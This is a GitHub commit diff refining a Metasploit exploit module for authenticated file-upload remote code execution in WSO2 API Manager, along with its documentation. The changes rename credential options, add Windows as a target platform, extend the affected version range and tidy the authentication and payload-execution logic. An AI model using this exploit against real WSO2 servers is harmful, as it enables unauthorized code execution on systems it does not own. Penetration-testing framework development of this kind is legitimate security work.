Skip to content

Commit dc445ed

Browse files
heyderheyder
committed
Apply suggestions from code review
1 parent e772c7a commit dc445ed

File tree

2 files changed

+16
-20
lines changed

2 files changed

+16
-20
lines changed

documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -60,11 +60,11 @@ exit
6060

6161
## Options
6262

63-
### USERNAME (required)
63+
### HttpUsername (required)
6464

6565
The username to authenticate with.
6666

67-
### PASSWORD (required)
67+
### HttpPassword (required)
6868

6969
The password of the user to authenticate with.
7070

modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

Lines changed: 14 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ def initialize(info = {})
3737
'SSL' => true,
3838
'RPORT' => 9443
3939
},
40-
'Platform' => %w[linux],
40+
'Platform' => %w[linux win],
4141
'Arch' => ARCH_JAVA,
4242
'Privileged' => false,
4343
'Targets' => [
@@ -47,7 +47,7 @@ def initialize(info = {})
4747
[
4848
'WSO2 API Manager (3.1.0 - 4.0.0)', {
4949
'min_version' => '3.1.0',
50-
'max_version' => '4.0.0',
50+
'max_version' => '4.0.9',
5151
'api_version' => 'v2'
5252
},
5353
],
@@ -201,11 +201,9 @@ def authenticate
201201
fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
202202
end
203203

204-
if bearer
205-
print_good('Authentication successful')
206-
else
207-
fail_with(Failure::UnexpectedReply, 'Authentication attempt failed')
208-
end
204+
fail_with(Failure::UnexpectedReply, 'Authentication attempt failed') unless bearer
205+
206+
print_good('Authentication successful')
209207
end
210208

211209
def list_product_api
@@ -259,7 +257,7 @@ def create_api
259257
'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
260258
},
261259
'production_endpoints' => {
262-
'url' => "https://#{target_uri.host}:9443/am/#{Faker::Internet.slug}/v1/api/"
260+
'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
263261
}
264262
},
265263
'operations' => [
@@ -322,9 +320,9 @@ def create_product_api
322320
return res.get_json_document
323321
end
324322

325-
def create_document(api_id, doc_name)
323+
def create_document(api_id)
326324
doc_data = {
327-
'name' => doc_name,
325+
'name' => Rex::Text.rand_text_alpha(4..7),
328326
'type' => 'HOWTO',
329327
'summary' => Faker::Lorem.sentence,
330328
'sourceType' => 'FILE',
@@ -378,20 +376,18 @@ def execute_payload
378376
'method' => 'GET'
379377
)
380378

381-
if res&.code == 200
382-
print_good('Payload executed successfully')
383-
handler
384-
else
385-
fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed')
386-
end
379+
fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed') unless res&.code == 200
380+
381+
print_good('Payload executed successfully')
382+
383+
handler
387384
end
388385

389386
def exploit
390-
doc_name = Rex::Text.rand_text_alpha(4..7)
391387
authenticate unless bearer
392388
api_avaliable = list_product_api
393389
api_avaliable.each do |product_api|
394-
doc_id = create_document(product_api['id'], doc_name)
390+
doc_id = create_document(product_api['id'])
395391
next unless doc_id
396392

397393
res = upload_payload(product_api['id'], doc_id)

0 commit comments

Comments
 (0)